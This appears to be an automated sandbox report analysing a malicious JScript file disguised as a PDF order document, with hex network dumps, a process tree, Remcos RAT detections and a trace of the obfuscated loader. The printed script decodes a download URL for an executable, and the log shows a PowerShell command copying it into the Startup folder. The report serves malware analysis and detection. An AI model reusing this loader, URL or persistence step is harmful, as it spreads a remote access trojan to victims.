                                                                                                        2022-11-03 22:35:57 UTC555INData Raw: 3b c2 7e e8 f0 90 82 fe c8 41 30 24 a3 bd 05 77 c9 4a 15 48 6b 27 62 c4 b0 c2 97 cf 86 2d 76 9f db 0d 15 d3 bf 32 da 32 fe 13 4e 6e 31 84 58 e0 15 c1 aa 4c cf fc 73 6a 13 4a 20 46 8d d0 84 ec 4b 77 c3 ac 5b 6e 07 eb b9 5b a2 50 55 48 9a a9 40 74 75 ed 1a d3 44 6c 5f 32 5f c0 4e 8a 15 0c 1f a0 6e c7 ff ee c1 99 3b 36 70 07 78 e7 c2 6e 14 8f e6 20 9c 70 6b f2 99 f8 0d cd da e9 dd fb 08 5b 77 0a 6c 2c fc 7e f5 fb 69 98 47 09 e3 9c 22 ba 06 9f 96 c5 51 fa 9f 5b 8e a1 f4 d3 f3 05 9a a8 53 d5 3f a8 30 b3 a1 9c ad dd 0e 02 ab e2 91 f3 df 01 3a 15 c5 1e 8d 10 79 7f e0 e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c fc e5 7a b3 e0 5b 8e 55 d8 6f fb 77 11 d8 c8 0c 5b f4 8c 0e 12 ab 2c 55 e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c e9 dd
                                                                                                        Data Ascii: ;~A0$wJHk'b-v22Nn1XLsjJ FKw[n[PUH@tuDl_2_Nn;6pxn pk[wl,~iG"Q[S?0:y[wl[wlz[Uow[,U[wl[wl[wl
                                                                                                        2022-11-03 22:35:57 UTC563INData Raw: a3 76 d8 8b 11 64 c0 43 60 e4 b3 b7 85 64 f9 7c 33 3f ee b3 f4 1f e2 a2 86 af 8e cd 74 46 7e 6f 4d 43 35 71 70 92 bc 55 12 d6 01 f6 e9 25 99 67 7c db d8 a7 77 a4 e7 49 0a ec 86 d7 c4 a8 34 c3 3e b1 a3 6f ca 35 45 a3 16 2d f5 ff a3 2c 13 5f 74 fa 6f c6 32 79 c4 10 5a d9 ac e3 12 ca 71 15 05 a2 4f 20 88 6a e6 72 d1 8c ff 97 44 f2 81 38 a1 07 df 7f 9d 8d 46 08 6c 3a 48 b1 6c a6 6a 53 d7 95 0f f5 62 7b 33 20 59 88 49 1e b8 c0 e1 1f 88 4e 56 0a 43 fa 48 a7 e2 89 34 6f 3a 42 d1 90 17 88 be f9 2c 21 ee a1 89 59 54 8e 81 b4 97 4c a2 5d 8e 8d dc c8 9b d6 3a 26 7a 49 ff fd 05 ff b2 5f f1 61 38 ca 16 e6 f6 bb c9 0f 43 55 0f 95 d6 7c 02 ba 8f 80 c2 03 0c 35 95 f5 95 5d e8 58 be 2f 18 69 44 3c 14 2c 94 5f cc 50 70 cc 11 27 7f bf d9 2f 0b 87 2a 47 a9 9d bf 5a f2 0c 63
                                                                                                        Data Ascii: vdC`d|3?tF~oMC5qpU%g|wI4>o5E-,_to2yZqO jrD8Fl:HljSb{3 YINVCH4o:B,!YTL]:&zI_a8CU|5]X/iD<,_Pp'/*GZc
                                                                                                        2022-11-03 22:35:57 UTC570INData Raw: 06 fe 08 01 01 07 01 59 28 01 00 01 01 09 01 66 28 01 00 01 01 0b 01 72 28 01 00 01 01 0d 01 7e 28 01 00 46 01 0f 01 92 28 01 00 03 01 11 01 9e 28 01 00 03 01 13 01 9e 28 01 00 03 01 15 01 9e 28 01 00 03 01 17 01 9e 28 01 00 03 01 19 01 9e 28 01 00 03 01 1b 01 9e 28 01 00 06 01 1f 01 ad 28 02 00 04 80 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 1f 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 0a 00 28 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 3e 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 45 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 0a 00 5a 00 00 00 00 00 00 00 00 00 01 00 00 00 81 00 00 00 14 9b 08 00 01 00 00 00 a2 00 00 00 07 00 06 00 08 00 06 00 09 00
                                                                                                        Data Ascii: Y(f(r(~(F(((((((((>EZ
                                                                                                        2022-11-03 22:35:57 UTC578INData Raw: 31 31 37 39 31 37 35 66 63 35 64 61 35 61 63 00 63 38 63 61 62 33 35 63 33 62 33 31 61 31 30 33 30 36 63 61 64 37 63 30 36 36 39 65 62 33 39 37 66 00 63 39 66 33 31 37 63 64 66 34 62 34 64 30 35 32 30 66 30 64 66 61 33 31 33 61 33 36 31 62 63 33 31 00 63 39 31 31 63 32 33 31 31 33 61 31 37 34 36 37 35 66 61 65 31 36 36 39 65 39 39 64 30 37 39 62 35 00 63 37 65 34 63 66 64 34 63 39 65 31 34 32 63 66 33 32 65 39 65 62 65 35 63 32 30 64 35 32 38 65 37 00 63 31 65 65 31 33 66 39 65 64 63 65 61 36 33 39 30 63 37 33 62 62 63 65 66 35 37 32 31 66 36 66 33 00 63 39 62 30 36 64 62 31 37 30 38 38 34 62 30 36 31 33 34 32 63 34 31 36 35 34 65 32 33 34 30 66 36 00 63 62 33 62 63 35 30 38 36 31 63 64 35 65 66 37 39 31 32 32 39 32 32 63 62 30 34 31 61 30 38 33 62 00 63
                                                                                                        Data Ascii: 1179175fc5da5acc8cab35c3b31a10306cad7c0669eb397fc9f317cdf4b4d0520f0dfa313a361bc31c911c23113a174675fae1669e99d079b5c7e4cfd4c9e142cf32e9ebe5c20d528e7c1ee13f9edcea6390c73bbcef5721f6f3c9b06db170884b061342c41654e2340f6cb3bc50861cd5ef79122922cb041a083bc
                                                                                                        2022-11-03 22:35:57 UTC586INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
                                                                                                        2022-11-03 22:35:57 UTC594INData Raw: 01 43 7f 73 5a 28 9f 24 7c a0 35 40 06 fa 94 af 0a a1 83 b6 13 e4 4b 15 06 5e 6a 8a 20 34 71 7b bb 25 ad 3f 5b 0a a4 1f 2f 6c 7d 2e 61 51 d0 8c 59 37 3e a6 5d f1 1e 5d 80 b6 d8 1f 60 e3 cd 12 6a 88 1f c6 fe 18 cb 93 43 56 7a c7 ce 03 d6 00 64 28 56 22 b1 4b 19 d2 f0 96 c9 44 1f 39 5d 9c b0 96 ed 5a 49 8d 7e 72 e4 43 6b 7f c9 a0 3f 6c 4a ad d5 00 4f bd 0a b8 83 c5 bd 98 2c 07 76 01 70 45 de c3 f0 42 69 ea ff 26 cc 03 44 1f 16 28 e1 6a 74 b6 9c 45 fa b6 3a ce 94 d1 1f bd 8c 65 aa fd fc c3 3c e8 0d 9c 38 66 d5 fc 7d 1e 9b 59 8c 91 5a 42 57 55 50 16 0d 4b 74 72 ee a0 2a 31 fc 26 02 34 f9 64 1b 59 fd e3 3a d4 e8 b8 41 29 74 01 3f 0d e0 13 77 2b 11 3c fb 3d cd d0 e7 e1 97 5b 55 f7 2a 03 6d d5 cd 62 da ce 9c 1e fc ea 70 7d e6 7d 4b 68 ce 5a 29 61 d3 a0 5c 25 b3
                                                                                                        Data Ascii: CsZ($|5@K^j 4q{%?[/l}.aQY7>]]`jCVzd(V"KD9]ZI~rCk?lJO,vpEBi&D(jtE:e<8f}YZBWUPKtr*1&4dY:A)t?w+<=[U*mbp}}KhZ)a\%


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:23:34:58
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js"
                                                                                                        Imagebase:0x7ff742790000
                                                                                                        File size:163840 bytes
                                                                                                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:10
                                                                                                        Start time:23:35:59
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"
                                                                                                        Imagebase:0x540000
                                                                                                        File size:613184 bytes
                                                                                                        MD5 hash:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 65%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        Target ID:11
                                                                                                        Start time:23:36:03
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
                                                                                                        Imagebase:0x160000
                                                                                                        File size:430592 bytes
                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Reputation:high

                                                                                                        Target ID:12
                                                                                                        Start time:23:36:03
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6da640000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:13
                                                                                                        Start time:23:36:12
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Imagebase:0xa80000
                                                                                                        File size:45152 bytes
                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:high

                                                                                                        Target ID:17
                                                                                                        Start time:23:37:58
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe"
                                                                                                        Imagebase:0x6b0000
                                                                                                        File size:613184 bytes
                                                                                                        MD5 hash:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 65%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        Target ID:18
                                                                                                        Start time:23:38:09
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
                                                                                                        Imagebase:0x160000
                                                                                                        File size:430592 bytes
                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Reputation:high

                                                                                                        Target ID:19
                                                                                                        Start time:23:38:10
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6da640000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:20
                                                                                                        Start time:23:38:27
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Imagebase:0xdc0000
                                                                                                        File size:45152 bytes
                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Call Graph

                                                                                                        • Executed
                                                                                                        • Not Executed

                                                                                                        Script:

                                                                                                        Code
                                                                                                        0
                                                                                                        function _0x5099(_0x304024, _0x5125dd) {
                                                                                                        • _0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                        • _0x5099(213,"SewZ") ➔ undefined
                                                                                                        • _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                        • _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                        • _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\."
                                                                                                        • _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                        • _0x5099(255,"CZq%") ➔ undefined
                                                                                                        • _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                        • _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                        • _0x5099(266,"SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                                                                                                        1
                                                                                                        var _0x3974d = _0x3974 ( );
                                                                                                        • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
                                                                                                        2
                                                                                                        return _0x5099 =
                                                                                                          3
                                                                                                          function (_0xe99d3f, _0x318392) {
                                                                                                          • _0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                          • _0x5099(213,"SewZ") ➔ undefined
                                                                                                          • _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                          • _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                          • _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\."
                                                                                                          • _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                          • _0x5099(255,"CZq%") ➔ undefined
                                                                                                          • _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                          • _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                          • _0x5099(266,"SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                                                                                                          4
                                                                                                          _0xe99d3f = _0xe99d3f - 0xc8;
                                                                                                            5
                                                                                                            var _0x59ecb7 = _0x3974d[_0xe99d3f];
                                                                                                              6
                                                                                                              if ( _0x5099['GLbovs'] === undefined )
                                                                                                                7
                                                                                                                {
                                                                                                                  8
                                                                                                                  var _0x12b176 = function (_0x5c0ef3) {
                                                                                                                  • _0x12b176("AXxcQSkOWRG") ➔ "k\x15\xaa\xa8\xb8"
                                                                                                                  • _0x12b176("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=") ➔ undefined
                                                                                                                  • _0x12b176("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                  • _0x12b176("w1vrmSoRW7VdJCkJWOVdGaldVq") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd"
                                                                                                                  • _0x12b176("nmkoFSotW53cKq") ➔ "4\x8e~\xd3\xdd\x91"
                                                                                                                  • _0x12b176("EMpdGSkmdSoXsCk+W6u") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5"
                                                                                                                  • _0x12b176("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined
                                                                                                                  • _0x12b176("W4yuy1BdPSoFWOOIgCo6qge") ➔ "\xc6\x14cV\xe6\xdf\x8a"\x19\xfa@a"
                                                                                                                  • _0x12b176("WQtdNh4FpYK") ➔ "\xa4\xdc~\x1f?)"
                                                                                                                  • _0x12b176("yxSPWPPSBJW") ➔ "a{)\x9aln<"
                                                                                                                  9
                                                                                                                  var _0x14b3e9 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                                                    10
                                                                                                                    var _0x4b257a = '', _0x33ffaf = '';
                                                                                                                      11
                                                                                                                      for ( var _0x376b0b = 0x0, _0x404151, _0x27f080, _0x17fea0 = 0x0 ; _0x27f080 = _0x5c0ef3['charAt'] ( _0x17fea0 ++ ) ; ~ _0x27f080 && ( _0x404151 = _0x376b0b % 0x4 ? _0x404151 * 0x40 + _0x27f080 : _0x27f080, _0x376b0b ++ % 0x4 ) ? _0x4b257a += String['fromCharCode'] ( 0xff & _0x404151 >> ( - 0x2 * _0x376b0b & 0x6 ) ) : 0x0 )
                                                                                                                        12
                                                                                                                        {
                                                                                                                          13
                                                                                                                          _0x27f080 = _0x14b3e9['indexOf'] ( _0x27f080 );
                                                                                                                            14
                                                                                                                            }
                                                                                                                              15
                                                                                                                              for ( var _0x35b3aa = 0x0, _0x366407 = _0x4b257a['length'] ; _0x35b3aa < _0x366407 ; _0x35b3aa ++ )
                                                                                                                                16
                                                                                                                                {
                                                                                                                                  17
                                                                                                                                  _0x33ffaf += '%' + ( '00' + _0x4b257a['charCodeAt'] ( _0x35b3aa ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                    18
                                                                                                                                    }
                                                                                                                                      19
                                                                                                                                      return decodeURIComponent ( _0x33ffaf );
                                                                                                                                      • decodeURIComponent("%6b%15%c2%aa%c2%a8%c2%b8") ➔ "k\x15\xaa\xa8\xb8"
                                                                                                                                      • decodeURIComponent("%00%10%83%10%51%87%20%92%8b%30%d3%8f%41%14%93%51%55%97%61%96%9b%71%d7%9f%82%18%a3%92%59%a7%a2%9a%ab%b2%db%af%c3%1c%b3%d3%5d%b7%e3%9e%bb%f3%df%bf") ➔ undefined
                                                                                                                                      • decodeURIComponent("%c2%8c%c2%85%c2%95%29%c3%be%c2%8c%73%35%45%c2%92%40%66") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                      • decodeURIComponent("%5b%55%51%32%c3%ab%c3%bb%c3%8d%c2%a3%c2%8b%c3%80%02%c3%bd") ➔ "[UQ2\xeb\xfb\xcd\xa3\x8b\xc0\x02\xfd"
                                                                                                                                      • decodeURIComponent("%34%c2%8e%7e%c3%93%c3%9d%c2%91") ➔ "4\x8e~\xd3\xdd\x91"
                                                                                                                                      • decodeURIComponent("%7a%63%c3%82%c2%8c%0e%c3%b1%49%c2%be%c3%a5") ➔ "zc\xc2\x8c\x0e\xf1I\xbe\xe5"
                                                                                                                                      • decodeURIComponent("%1d%34%cf%4b%ff%d3%18%2f%17%4c%af%d3%4f%fb%e7%ce%f9%dc%c6%49%23%b1%f1%17") ➔ undefined
